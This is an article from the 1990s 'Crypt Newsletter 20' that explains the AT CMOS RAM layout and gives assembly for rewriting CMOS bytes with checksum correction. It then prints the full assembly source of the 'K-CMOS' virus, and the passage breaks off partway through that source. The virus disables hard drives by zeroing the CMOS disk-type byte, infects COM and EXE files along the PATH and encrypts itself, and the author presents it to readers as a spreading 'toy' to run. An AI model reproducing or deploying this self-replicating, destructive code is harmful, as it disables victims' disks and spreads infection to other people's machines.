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K-CM”S VIRUS for Crypt Newsletter 20
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In my quest to bring the latest hi-tech computer virus
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toys to you, faithful reader, I have researched one of the
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relatively untouched-by-viruses parts of an AT computer:
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the CMOS.
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The CMOS (Complementary Metal Oxide Semiconductor) is a
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low power consumption semiconductor where information such as
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the current equipment settings, hard drive type, time and
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date is stored and maintained using a NiCad battery that is
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recharged every time you turn on the computer. (That is why
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it's a good idea to turn on the computer every once in a while
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if you are not using it for long periods. This prevents
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battery discharge and loss of CMOS settings.)
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The CMOS in your computer is changed and set every time
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you run the Setup program that comes with your BIOS (AMI,
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Phoenix), and can be accessed and changed by any program
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running from DOS.
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The AT CMOS RAM is divided into three areas:
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1 - The clock/calendar bytes
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2 - The control registers
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3 - General purpose RAM.
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The following table describes the CMOS RAM location and what
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each byte is used for:
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OFFSET byte DESCRIPTION
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Real Clock Data
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00 Current second in BCD
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01 Alarm second in BCD
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02 Current minute in BCD
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03 Alarm minute in BCD
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04 Current Hour in BCD
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05 Alarm Hour in BCD
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06 Current day of week in BCD
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07 Current day in BCD
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08 Current month in BCD
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09 Current year in BCD
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Status Registers
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0A Status Register A
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0B Status Register B
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0C Status Register C
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0D Status Register D
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Configuration Data
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0E Diagnostic Status
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Bit 7 - Clock Lost Power
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Bit 6 - Bad CMOS checksum
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Bit 5 - invalid config info at POST
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Bit 4 - memory Size compare error at POST
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Bit 3 - Fixed disk or adapter failed initialization
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Bit 2 - Invalid CMOS time
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Bits 1-0 - Reserved
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0F Reason for Shutdown
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00 - Power on or reset
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01 - Memory Size pass
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02 - Memory test pass
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03 - memory test fail
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04 - POST end: boot system
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05 - jmp doubleword pointer with EOI
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06 - Protected tests pass
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07 - Protected tests fail
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08 - Memory size fail
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09 - INT 15h Block move
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0A - JMP double word pointer without EOI
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10 Diskette Drive Types
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Bits 7-4 - Diskette drive 0 type
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Bits 3-0 - Diskette drive 1 type
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0000b - no drive
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0001b - 360K drive
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0010b - 1.2MB drive
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0011b - 720K drive
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0100b - 1.44 MB drive
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0101b - 2.88 MB drive
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11 Reserved
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12 Fixed Disk Drive Types
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Bits 7-4 - Fixed Disk drive 0 type
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Bits 3-0 - Fixed Disk drive 1 type
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0000b - no drive
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(Note: These drives do not necessarily
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correspond with the values stored at
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locations 19h and 1Ah)
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13 Reserved
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14 Equipment Installed
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Bits 7-6 - # of Diskette drives
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00b - 1 diskette drive
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01b - 2 diskette drives
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Bits 5-4 - Primary Display
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00b - reserved
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01b - 40 X 25 color
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10b - 80 X 25 color
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11b - 80 X 25 monochrome
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Bits 3-0 - Reserved
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15 Base Memory in 1K low byte
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16 Base Memory in 1K high byte
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17 Expansion Memory size low byte
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18 Expansion Memory size high byte
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19 Fixed Disk Drive Type 0
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1A Fixed Disk Drive Type 1
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1B-2D Reserved
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2E Configuration Data checksum high byte
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2F Configuration Data checksum low byte
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30 Actual Expansion Memory size low byte
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31 Actual Expansion Memory size high byte
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32 Century in BCD
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33 Information Flag
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Bit 7 - 128 Kbyte expanded
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Bit 6 - Setup Flag
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Bits 5-0 - Reserved
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34-3F Reserved
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As you can see, there are a total of 63 (3F hex) bytes of
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CMOS RAM, with 33 bytes used as 'reserved' memory in the
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three areas; these locations are not currently defined by
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the AT BIOS and might be used to store data that will be
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restored after power is shut down.
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The 4 status registers (A through D) located, appropriately, at
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locations 0Ah through 0Dh define the chips operating
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parameters and provide information about interrupts and the
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state of the real time clock chip (RTC).
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With very few restrictions all CMOS RAM locations may be
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directly accessed by an application.
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Program locations 11h, 13h, and 1Bh through 2Dh are used
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in calculating the CMOS checksum that the BIOS stores at
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locations 2Eh and 2Fh.
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Note: If a program changes ANY bytes at locations 10h
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through 2Dh it must also recalculate the checksum and store
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the new value. Changing these bytes (10h -> 2Dh) without
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correcting the checksum results in a 'CMOS checksum error'
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forcing you to run the BIOS setup and reenter all of the CMOS
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information.
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The reserved memory locations 34h through 3Fh are not used in
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checksum calculations and may be changed with extreme caution
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since different BIOS versions, manufacturers and hardware
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configurations use this reserved CMOS RAM locations for
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extended system setup information including BIOS passwords
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and DMA settings.
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To access and change a computer's CMOS RAM is very simple:
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Access is done through ports 70 hex (CMOS control/address)
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and port 71 hex (CMOS data).
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The process is thus:
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1 - We specify the CMOS RAM address of the byte we want to
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read or write using port 70h
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EXAMPLE:
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mov al,XX where XX = byte specifying the address (00h->3Fh)
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out 70h,al
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2 - We read or write a byte to the address specified in step
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1.
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READ EXAMPLE:
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in al,71h byte at location XX goes into AL
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WRITE EXAMPLE:
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out 71h,al byte in AL goes to location XX in the CMOS RAM
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There is one little problem: if we are writing to any of the
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locations that are checksummed (10h through 2Dh), we must
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change the checksum value as well; so we follow steps 1 and 2
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with the checksum values at locations 2Eh and 2Fh, combine
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the bytes into one register and subtract the current byte
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value from the register containing the checksum. Then we add
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the value of the new byte to be put in the CMOS RAM to the
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register that has the checksum, and we write the checksum,
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and the new byte to the CMOS.
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While all of this might seem too complicated, I have
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written a mini-CM”S toolkit, a routine that takes the address
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and the new value of the byte to be put in the CMOS, and does
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the dirty work of putting the values and of changing the
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checksum for you.
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Read the code carefully. It will make everything become
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clearer.
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;==============================================================================
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CMOS_CHCKSM:
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; INPUT:
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; DL = CMOS ADDRESS of BYTE TO be MODiFiED
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; BL = NEW BYTE VALUE to be PUT IN CMOS RAM
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; OUTPUT:
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; None.
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; REGISTERS USED: AX,CX,BX,DX
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;*************************
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; GET CMOS Checksum => CX
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;*************************
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xor ax,ax
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mov al,2Eh ;msb of checksum address
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out 70h,al ;send address / control byte
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in al,71h ;read byte
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xchg ch,al ;store al in ch
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mov al,2Fh ;lsb of checksum address
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out 70h,al ;send address / control byte
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in al,71h ;read byte
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xchg cl,al ;store lsb to cl
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;*********************
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; Fix CMOS Checksum
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;*********************
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push dx
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xchg dl,al ;AL = address
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out 70h,al ;send address / control byte
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in al,71h ;read register
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sub cx,ax ;subtract from checksum
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add cx,bx ;update checksum value in register.
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;****************************
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; Write CMOS byte to Address
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;****************************
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pop dx
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xchg dl,al ;AL = address
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out 70h,al ;specify CMOS address
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xchg al,bl ;new CMOS value => al
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out 71h,al ;write new CMOS byte
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;*********************
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; Write CMOS Checksum
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;*********************
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mov al,2Eh ;address of checksum 's msb
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out 70h,al ;specify CMOS address
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xchg al,ch ;msb of new checksum
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out 71h,al ;write new CMOS msb
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mov al,2Fh ;address of checksum 's lsb
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out 70h,al ;specify CMOS address
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xchg al,cl ;lsb of new checksum
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out 71h,al ;write new CMOS lsb
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ret
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;==============================================================================
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It is worth mentioning that for XT (8088) type computers
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the CMOS routine will have no adverse effects in the
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execution of the virus-infected program.
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There are many intriguing features of CMOS-attacking
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viruses: The biggest one is the interaction between software
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and CMOS is not stopped by common anti-virus memory
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resident programs. The most talked about example of such
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a virus is the South African EXEbug, which uses CMOS
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manipulation to make itself difficult to remove from an
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infected hard disk. EXEbug massages the CMOS so that if
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the machine is booted from a diskette and the virus is
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not in memory, the infected hard disk is not recognized.
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The list of possible problems created by a CMOS
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attacking virus is long:
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1 - CMOS checksum errors.
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This will force the user to reenter all of the CMOS data.
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Change any value in the correct CMOS range without
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updating the checksum.
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2 - Dead disk / hard drives.
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This could drive the uninformed to presume they have
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encountered a hardware problem.
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3 - Changed hardrive types, horrendous hardrive problems.
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For example: Input the hardrive type byte, subtract some small
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digit from it and output the byte to the CMOS. (The checksum
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must be fixed!) and a horrible mess results on subsequent
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boot up.
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4 - Changed dates, times, etc.
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The uninformed could thing the Nicad battery has died,
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or that his/her computer is possessed by evil, Nigerian
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Deities.
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5 - Changed BIOS passwords, inability to access a computer.
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On newer AMI BIOSes you can set or change the password
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required to access the computer. This topic was discussed
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briefly in a recent issue of Virus News International, the
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upshot being that the unsuspecting could be flummoxed into
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throwing the computer out the window, or more realistically,
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calling a technician. In the case where some knowledge about
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computers is present, the case is opened and the jumper
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found to short the CMOS. (No, you don't have to disconnect
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the battery. And you didn't throw out your machine manuals
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did you?)
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Although many anti-virus programs can save and restore
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your CMOS values as part of their function, currently there
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is only one memory resident program that checks for changes
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in the CMOS: Thunderbyte's TBMEM.
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This month's example, K-CM”S, falls in category #2: it
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kills all fixed disk drives by zeroing out location 12h in
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the CMOS RAM. It also has some encryption abilities (a 16
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byte constant decryptor) and a PATH style infection routine
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that actually works!
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Needless to say, careful handling is necessary as it can
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spread quite rapidly.
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Important: Since K-CMOS zero's the CMOS value for the fixed
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disk on execution, unless you restore the value before ending
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your experiment with some software CMOS reloading tool, you
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will have a dead C: drive when you finally get around to
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rebooting. Keep in mind that if you don't know how to reset
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your CMOS on power up using the built in BIOS setup, you will
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sit there in a dumb stew wondering why you ran a virus which
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unhooked your hard drive.
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To prevent this from happening, you must familiarize yourself
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with the BIOS setup program. Here is a brief walkthrough which
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could be used to properly restore your machine after K-CMOS
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has altered your CMOS:
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1 - BEFORE you execute K-CMOS - on power up, bring up your
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BIOS setup by holding down the DEL key while you are booting
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the computer.
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2 - You will probably see a screen with a number of selections.
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You will want to bring up "Change Basic CMOS Settings" or its
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equivalent. Write down the values for the HD types on drives
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C and D.
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3- IF the hard drive types are "47" the you MUST record all
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of the data in the displayed fields, i.e, the information
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such as the number of heads, sectors, etc. Again, you MUST
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do this BEFORE you run K-CMOS or you will have to look in
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your manuals somewhere to get the specific HD information!
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NOTE: Newer AMI BIOSes have an auto-detect feature in the
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Setup menu, so you might not have to worry about hard disk type
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number, number of sectors, number of heads, etc., if you have
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the feature in your computer's BIOS. The setup will do the
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work for you.
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4 - Now that you've recorded this data, you can test K-CMOS
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and watch it unhook your system. On reboot, you will lose the
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hard disk. Reboot, bring up your Setup program as above, re-
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enter the values for the hard disk which you previously
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recorded, exit and save. You are back in business.
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Enjoy!
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$
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;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
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; K-CM”S.ASM
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; AUTHOR: K”hntark
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; DATE: November 93
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; Size: < 1100 bytes
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;
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;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
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MAIN SEGMENT BYTE
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ASSUME cs:main,ds:main,ss:nothing ;all part in one segment=com file
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ORG 100h
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;**********************************
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; fake host program
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;**********************************
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HOST:
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db 0E9h,0Ah,00 ;jmp NEAR PTR VIRUS
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db ' '
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db 90h,90h,90h
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mov ah,4CH
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mov al,0
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int 21H ;terminate normally with dos
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;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
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;**********************************
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; VIRUS CODE STARTS HERE
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;**********************************
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VIRUS:
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mov si,010Dh ;get starting address
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;************************************
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; Fix DS ES
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;************************************
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mov al,cs:BYTE PTR [si + COM_FLAG - VIRUS] ;save COM/EXE flag in AX
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mov WORD PTR cs:[si + PSP_SEG - VIRUS],es ;save PSP segment for use in PATH search
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push ax ;save COM/EXE flag
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push es ;save es and ds in case file is EXE
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push ds
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push cs
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push cs
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pop es ;es = cs
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pop ds ;ds = cs
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push WORD PTR [si + ORIG_IPCS - VIRUS] ;save IP
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push WORD PTR [si + ORIG_IPCS - VIRUS + 2] ;save CS
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push WORD PTR [si + ORIG_SSSP - VIRUS] ;save SS
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push WORD PTR [si + ORIG_SSSP - VIRUS + 2] ;save SP
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push WORD PTR [si + START_CODE - VIRUS]
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push WORD PTR [si + START_CODE - VIRUS + 2]
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;************************************
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; redirect DTA onto virus code
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;************************************
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lea dx,[si + DTA - VIRUS] ;put DTA at the end of the virus for now
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mov ah,1ah ;set new DTA function to ds:dx
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int 21h
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;************************************
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; KIll fixed disk drives in CMOS
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;************************************
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mov dx,0012h ;hard drive type register
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xor bx,bx ;New hard drive type = 0 (No Fixed drive)
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call CMOS_CHCKSM
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;************************************
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; MAIN Routines called from here
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;************************************
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lea bp,[si + COM_MASK - VIRUS]
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call FIND_FILE ;get a com file to attack!
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lea bp,[si + EXE_MASK - VIRUS]
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call FIND_FILE ;get an exe file to attack!
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;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
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EXIT_VIRUS:
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;************************************
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; set old DTA address
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;************************************
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mov ah,1ah
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mov dx,80h ;fix dta back to ds:dx
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int 21h ;host program
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pop WORD PTR [si + START_CODE - VIRUS + 2]
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pop WORD PTR [si + START_CODE - VIRUS]
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cli
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pop WORD PTR [si + ORIG_SSSP - VIRUS + 2] ;save SP
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pop WORD PTR [si + ORIG_SSSP - VIRUS] ;save SS
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sti
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pop WORD PTR [si + ORIG_IPCS - VIRUS + 2] ;save CS
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pop WORD PTR [si + ORIG_IPCS - VIRUS] ;save IP
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pop ds ;restore ds
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pop es ;restore es
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pop ax ;restore COM_FLAG
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cmp al,00 ;com infection?
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je RESTORE_COM
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;************************************
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; restore EXE.. and exit..
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;************************************
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mov bx,ds ;ds has to be original one
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add bx,low 10h
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mov cx,bx
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add bx,cs:WORD PTR [si + ORIG_SSSP - VIRUS] ;restore ss
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cli
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mov ss,bx
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mov sp,cs:WORD PTR [si + ORIG_SSSP - VIRUS + 2] ;restore sp
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sti
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add cx,cs:WORD PTR [si + ORIG_IPCS - VIRUS+ 2]
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push cx ;push cs
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push cs:WORD PTR [si + ORIG_IPCS - VIRUS] ;push ip
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db 0CBh ;retf
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;************************************
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; restore 4 original bytes to file
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;************************************
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RESTORE_COM:
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push si ;save si
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cld ;clear direction flag
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add si,OFFSET START_CODE - OFFSET VIRUS ;source: ds:si
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mov di,0100h ;destination: es:di
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movsw ;shorter & faster than
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movsw ;mov cx,04 and rep movsb
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|
pop si ;restore si
|
|
|
|
;****************************************************************
|
|
; zero out registers for return to
|
|
; host program
|
|
;****************************************************************
|
|
|
|
mov ax,0100h ;return address
|
|
xor bx,bx
|
|
xor cx,cx
|
|
xor si,si
|
|
xor di,di
|
|
push ax
|
|
xor ax,ax
|
|
cwd
|
|
ret
|
|
|
|
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
|
|
NO_GOOD: stc
|
|
jmp GET_OUT
|
|
|
|
QUICK_EXIT: stc ;set carry flag
|
|
ret
|
|
|
|
;-----------------------------------------------------------------------------
|
|
|
|
CHECK_N_INFECT_FILE:
|
|
|
|
;******************
|
|
; 1-Check TIME ID
|
|
;******************
|
|
|
|
mov cx,WORD PTR [si + DTA_File_TIME - VIRUS] ;file time from DTA
|
|
and cl,1Dh ;58 seconds?
|
|
cmp cl,1Dh
|
|
je QUICK_EXIT
|
|
|
|
;*********************************************
|
|
; 2-Clear attributes
|
|
;*********************************************
|
|
|
|
lea dx,[si + WORK_AREA - VIRUS] ;dx=ptr to path + current filename
|
|
xor cx,cx ;set attributes to normal
|
|
mov ax,4301h ;set file attributes to cx
|
|
int 21h ;int 21h
|
|
jc QUICK_EXIT ;error.. quit
|
|
|
|
;*****************
|
|
; 3-OPEN FILE
|
|
;*****************
|
|
|
|
mov ax,3D02h ;r/w access to it
|
|
int 21h
|
|
jc NO_GOOD ;error.. quit
|
|
xchg ax,bx ;bx = file handle
|
|
|
|
;********************
|
|
; 4-Read 1st 28 bytes
|
|
;********************
|
|
|
|
mov cx,28d ;read first 5 bytes of file
|
|
lea dx,[si + START_CODE - VIRUS] ;store'em here
|
|
mov ah,3Fh ;DOS read function
|
|
int 21h
|
|
jc NO_GOOD ;error? get next file
|
|
|
|
;*********************
|
|
; 5-CHECK FILE
|
|
;*********************
|
|
|
|
cmp WORD PTR [si + START_CODE - VIRUS],'ZM' ;EXE file?
|
|
je CHECK_EXE ;no? check com
|
|
|
|
cmp WORD PTR [si + START_CODE - VIRUS],'MZ' ;EXE file?
|
|
je CHECK_EXE ;no? check com
|
|
|
|
CHECK_COM:
|
|
mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS] ;get file's size
|
|
push ax ;insert new entry point just in case..
|
|
add ax,100h + DECRYPTOR_SIZE
|
|
mov WORD PTR [si + 1],ax
|
|
pop ax
|
|
|
|
add ax,OFFSET FINAL - OFFSET VIRUS ;add virus size to it
|
|
jc NO_GOOD ;bigger then 64K:nogood
|
|
|
|
cmp BYTE PTR [si + START_CODE - VIRUS],0E9H ;compare 1st byte to near jmp
|
|
jne short INFECT_COM ;not a near jmp, file ok
|
|
|
|
cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h ;check for ' '
|
|
je NO_GOOD ;file ok .. infect
|
|
jmp short INFECT_COM
|
|
|
|
|
|
CHECK_EXE:
|
|
cmp WORD PTR [si + START_CODE - VIRUS + 18h],40h ;Windows file?
|
|
je NO_GOOD ;no? check com
|
|
|
|
cmp WORD PTR [si + START_CODE - VIRUS + 01Ah],0 ;internal overlay
|
|
jne NO_GOOD ;yes? exit..
|
|
|
|
cmp WORD PTR [si + START_CODE - VIRUS + 12h],ID ;already infected?
|
|
je NO_GOOD
|
|
|
|
INFECT_EXE:
|
|
mov BYTE PTR [si+ COM_FLAG - VIRUS],01 ;exe infection
|
|
jmp short SKIP
|
|
|
|
INFECT_COM:
|
|
mov BYTE PTR [si+ COM_FLAG - VIRUS],00 ;com infection
|
|
|
|
SKIP:
|
|
|
|
;*********************
|
|
; 6-set PTR @EOF
|
|
;*********************
|
|
|
|
xor cx,cx ;prepare to write virus on file
|
|
xor dx,dx ;position file pointer,cx:dx = 0
|
|
;cwd ;position file pointer,cx:dx = 0
|
|
mov ax,4202H
|
|
int 21h ;locate pointer at end EOF DOS function
|
|
|
|
;*********************
|
|
; 7-Fix deCRYPTtor
|
|
;*********************
|
|
|
|
push ax ;save file size (COM file, for EXE files
|
|
;this is redone later)
|
|
add ax,100h + DECRYPTOR_SIZE
|
|
mov WORD PTR [si + WORK_BUFFER - VIRUS + 4],ax ;insert address
|
|
mov ax,(OFFSET FINAL - OFFSET VIRUS)/2 ;virus size in Words
|
|
mov WORD PTR [si + WORK_BUFFER - VIRUS + 1],ax ;insert size
|
|
|
|
in al,40h ;get a random word in AX
|
|
xchg ah,al
|
|
in al,40h
|
|
xor ax,0813Ch
|
|
add ax,09249h
|
|
rol al,1
|
|
ror ah,1
|
|
|
|
mov WORD PTR [si + WORK_BUFFER - VIRUS + 9],ax ;insert random KEY
|
|
pop ax ;restore file size
|
|
|
|
|
|
cmp BYTE PTR [si+ COM_FLAG - VIRUS],01 ;exe file?
|
|
jne DO_COM
|
|
|
|
;*************************
|
|
; 8-FIX AND WRITE EXE HDR
|
|
;*************************
|
|
|
|
push bx ;save file handler
|
|
|
|
;-----------------------
|
|
; save CS:IP & SS:SP
|
|
;-----------------------
|
|
|
|
push si
|
|
cld ;clear direction flag
|
|
lea di,[si + ORIG_SSSP - VIRUS] ;save original CS:IP at es:di
|
|
lea si,[si + START_CODE - VIRUS + 14d] ;from ds:si
|
|
movsw ;save ss
|
|
movsw ;save sp
|
|
|
|
add si,02 ;save original SS:SP
|
|
movsw ;save ip
|
|
movsw ;save cs
|
|
pop si
|
|
|
|
;-----------------------------
|
|
; calculate new CS:IP
|
|
;-----------------------------
|
|
|
|
mov bx,WORD PTR[si + START_CODE - VIRUS + 8] ;header size in paragraphs
|
|
mov cl,04 ;multiply by 16, won't work with headers > 4096
|
|
shl bx,cl ;bx=header size
|
|
|
|
push ax ;save file size at dx:ax
|
|
push dx
|
|
|
|
sub ax,bx ;file size - header size
|
|
sbb dx,0000h ;fix dx if carry, assures dx, ip < 16
|
|
|
|
call CALCULATE
|
|
|
|
mov WORD PTR [si+ START_CODE - VIRUS + 12h],ID ;put ID in checksum slot
|
|
mov WORD PTR [si+ START_CODE - VIRUS + 14h],ax ;IP
|
|
add ax,DECRYPTOR_SIZE
|
|
mov WORD PTR [si+1],ax ;insert new starting address
|
|
mov WORD PTR [si + WORK_BUFFER - VIRUS + 4],ax ;insert address on decryptor
|
|
mov WORD PTR [si+ START_CODE - VIRUS + 16h],dx ;CS
|
|
|
|
;-----------------------------
|
|
; calculate & fix new SS:SP
|
|
;-----------------------------
|
|
|
|
pop dx
|
|
pop ax ;filelength in dx:ax
|
|
|
|
add ax,OFFSET FINAL - OFFSET VIRUS ;add filesize to ax
|
|
adc dx,0000h ;fix dx if carry
|
|
|
|
push ax
|
|
push dx
|
|
add ax,40h ;if filesize + virus size is even then the stack size
|
|
test al,01 ;even or odd stack?
|
|
jz EVENN
|
|
inc ax ;make stack even
|
|
EVENN:
|
|
call CALCULATE
|
|
|
|
mov WORD PTR [si+ START_CODE - VIRUS + 10h],ax ;SP
|
|
mov WORD PTR [si+ START_CODE - VIRUS + 0Eh],dx ;SS
|
|
|
|
;-----------------------------
|
|
; Calculate new file size
|
|
;-----------------------------
|
|
|
|
pop dx
|
|
pop ax
|
|
|
|
push ax
|
|
mov cl,0009h ;2^9 = 512
|
|
ror dx,cl ;/ 512 (sort of)
|
|
shr ax,cl ;/ 512
|
|
stc ;set carry flag
|
|
adc dx,ax ;fix dx , page count
|
|
pop cx
|
|
and ch,0001h ;mod 512
|
|
|
|
mov WORD PTR [si+ START_CODE - VIRUS + 4],dx ;page count
|
|
mov WORD PTR [si+ START_CODE - VIRUS + 2],cx ;save remainder
|
|
|
|
pop bx ;restore file handle
|
|
|
|
DO_COM:
|
|
|
|
;*********************
|
|
; 9-write deCRYPTor
|
|
;*********************
|
|
|
|
lea dx,[si + WORK_BUFFER - VIRUS] ;write from here
|
|
mov cx,DECRYPTOR_SIZE ;write # of bytes
|
|
mov ah,40h ;write to file bx=file handle
|
|
int 21h ;write from DS:DX
|
|
|
|
;*********************
|
|
; 10-enCRYPT virus
|
|
;*********************
|
|
|
|
push ds ;save DS
|
|
push es ;save ES
|
|
mov ax,0A00h ;set up new ES (work) segment
|
|
push ax
|
|
pop es ;ES=AX=0A00h
|
|
xor di,di ;DI=0
|
|
mov cx,(OFFSET FINAL - OFFSET VIRUS)/2 ;virus size cx= # words
|
|
push si ;save SI
|
|
mov dx,WORD PTR [si + WORK_BUFFER - VIRUS + 9] ;get Random KEY in DX
|
|
|
|
enCRYPT:
|
|
lodsw ;word ptr ds:[si] => ax
|
|
sub ax,dx ;encrypt ax
|
|
stosw ;ax => word ptr es:[di]
|
|
loop enCRYPT
|
|
|
|
pop si ;restore SI
|
|
xor dx,dx ;DX=0
|
|
push es
|
|
pop ds ;DS=ES
|
|
|
|
;*********************
|
|
; 11-Write Virus
|
|
;*********************
|
|
|
|
mov cx,OFFSET FINAL - OFFSET VIRUS ;write virus cx= # bytes
|
|
mov ah,40h ;write to file bx=file handle
|
|
int 21h ;write from DS:DX
|
|
|
|
pop es ;restore ES
|
|
pop ds ;restore DS
|
|
|
|
;*********************
|
|
; 12-set PTR @BOF
|
|
;*********************
|
|
|
|
mov ax,4200h ;locate pointer at beginning of
|
|
xor cx,cx
|
|
xor dx,dx ;position file pointer,cx:dx = 0
|
|
;cwd ;position file pointer,cx:dx = 0
|
|
int 21h ;host file
|
|
|
|
cmp BYTE PTR [si+ COM_FLAG - VIRUS],01 ;exe file?
|
|
jne DO_COM2
|
|
|
|
;*********************
|
|
; 13-Write EXE Header
|
|
;*********************
|
|
|
|
mov cx,28d ;#of bytes to write
|
|
lea dx,[si + START_CODE - VIRUS] ;ds:dx=pointer of data to write
|
|
jmp short CONT
|
|
|
|
;****************************************************
|
|
; 14-write new 4 bytes to beginning of file (COM)
|
|
;***************************************************
|
|
|
|
DO_COM2:
|
|
mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS]
|
|
sub ax,3
|
|
mov WORD PTR [si + START_IMAGE + 1 - VIRUS],ax
|
|
|
|
mov cx,4 ;#of bytes to write
|
|
lea dx,[si + START_IMAGE - VIRUS] ;ds:dx=pointer of data to write
|
|
|
|
CONT:
|
|
mov ah,40h ;DOS write function
|
|
int 21h ;write 5 / 28 bytes
|
|
|
|
;*************************************************
|
|
; 15-Restore date and time of file to be infected
|
|
;*************************************************
|
|
|
|
mov ax,5701h
|
|
mov dx,WORD PTR [si + DTA_File_DATE - VIRUS]
|
|
mov cx,WORD PTR [si + DTA_File_TIME - VIRUS]
|
|
and cx,0FFE0h ;mask all but seconds
|
|
or cl,1Dh ;seconds to 58
|
|
int 21h
|
|
|
|
GET_OUT:
|
|
;****************
|
|
; 16-Close File
|
|
;****************
|
|
|
|
pushf ;save flags to return on exit
|
|
mov ah,3Eh
|
|
int 21h ;close file
|
|
|
|
;*************************************************
|
|
; 17-Restore file's attributes
|
|
;*************************************************
|
|
|
|
mov ax,4301h ;set file attributes to cx
|
|
lea dx,[si + WORK_AREA - VIRUS] ;dx=ptr to path + current filename
|
|
xor cx,cx
|
|
mov cl,BYTE PTR [si + DTA_File_ATTR - VIRUS] ;get old attributes
|
|
int 21h
|
|
popf ;restore flags to return on exit
|
|
ret ;infection done!
|
|
|
|
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
|
|
CALCULATE:
|
|
mov cl,0Ch
|
|
shl dx,cl ;dx * 4096
|
|
mov bx,ax
|
|
mov cl,4
|
|
shr bx,cl ;ax / 16
|
|
add dx,bx ;dx = dx * 4096 + ax / 16 =SS CS
|
|
and ax,0Fh ;ax = ax and 0Fh =SP IP
|
|
ret
|
|
|
|
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
|
|
FIND_FILE:
|
|
push si
|
|
push es
|
|
mov es,es:WORD PTR [si + PSP_SEG - VIRUS] ;es=saved PSP segment
|
|
mov es,es:2ch ;es:di points to environment
|
|
xor di,di
|
|
mov bx,si
|
|
FIND_PATH:
|
|
lea si,[bx + PATH_STR - VIRUS] ;source :ds:si = 'P'
|
|
lodsb ;load 'P'
|
|
mov cx,7FFFh ;size of environment= 32768 bytes
|
|
not cx ;cx=8000h
|
|
repne scasb ;find 'P' in es:di
|
|
mov cx,4
|
|
|
|
CHECK_NEXT_4:
|
|
lodsb ;check for 'ATH'
|
|
scasb
|
|
jne FIND_PATH
|
|
loop CHECK_NEXT_4
|
|
|
|
mov WORD PTR [bx + PATH_ADDRESS - VIRUS],di ;save path's address es:di
|
|
lea di,[bx + WORK_AREA - VIRUS]
|
|
pop es ;restore PSP segment
|
|
jmp short COPY_FILE_SPEC_TO_WORK_AREA
|
|
|
|
NO_FILE_FOUND:
|
|
cmp word ptr [bx + PATH_ADDRESS - VIRUS],0 ;has path string ended?
|
|
jne FOLLOW_THE_PATH ;if not there are more subdirs
|
|
jmp EXIT ;path string ended.. exit
|
|
|
|
FOLLOW_THE_PATH:
|
|
lea di,[bx + WORK_AREA - VIRUS] ;destination es:di = work area
|
|
mov si,WORD PTR [bx + PATH_ADDRESS - VIRUS] ;source ds:si = Environment
|
|
mov ds,WORD PTR [bx + PSP_SEG - VIRUS] ;ds=PSP segment
|
|
mov ds,ds:2ch ;ds:si points to environment
|
|
|
|
UP_TO_LODSB:
|
|
lodsb ;get character
|
|
xchg cx,ax ;he he
|
|
cmp cl,';' ;is it a ';'?
|
|
xchg cx,ax ;he he
|
|
je SEARCH_AGAIN
|
|
cmp al,0 ;end of path string?
|
|
je CLEAR_SI
|
|
stosb ;save path marker into di
|
|
jmp SHORT UP_TO_LODSB
|
|
|
|
CLEAR_SI: ;mark the fact that we are looking thru the final subdir
|
|
xor si,si
|
|
|
|
SEARCH_AGAIN:
|
|
mov WORD PTR cs:[bx + PATH_ADDRESS - VIRUS],si ;save address of next subdir
|
|
cmp BYTE PTR cs:[di-1],'\' ;ends with a '\'?
|
|
je COPY_FILE_SPEC_TO_WORK_AREA
|
|
mov al,'\' ;add '\' if not
|
|
stosb
|
|
|
|
;***********************************************
|
|
; put *.COM / *.EXE into workspace
|
|
;***********************************************
|
|
|
|
COPY_FILE_SPEC_TO_WORK_AREA:
|
|
push cs
|
|
pop ds ;ds=cs
|
|
mov WORD PTR [bx + FILENAME_PTR - VIRUS],di ;es:di = WORK_AREA
|
|
mov si,bp ;bp=file spec
|
|
mov cx,3 ;length of *.com0/ *.EXE0
|
|
rep movsw ;move *.COM0/ *.EXE0 to workspace
|
|
|
|
;************************************************
|
|
; Find FIRST FILE
|
|
;************************************************
|
|
|
|
mov ah,04EH ;DOS function
|
|
lea dx,[bx + WORK_AREA - VIRUS] ;dx points to path in workspace
|
|
mov cx,3Fh ;attributes RO or hidden OK
|
|
FIND_NEXT_FILE: int 21H
|
|
jnc FILE_FOUND
|
|
jmp short NO_FILE_FOUND
|
|
|
|
FILE_FOUND:
|
|
mov di,WORD PTR [bx + FILENAME_PTR - VIRUS] ;destination: es:di
|
|
lea si,[bx + DTA_File_NAME - VIRUS] ;origin ds:si
|
|
|
|
MOVE_ASCII_FILENAME:
|
|
lodsb ;move filename to the end of path
|
|
stosb
|
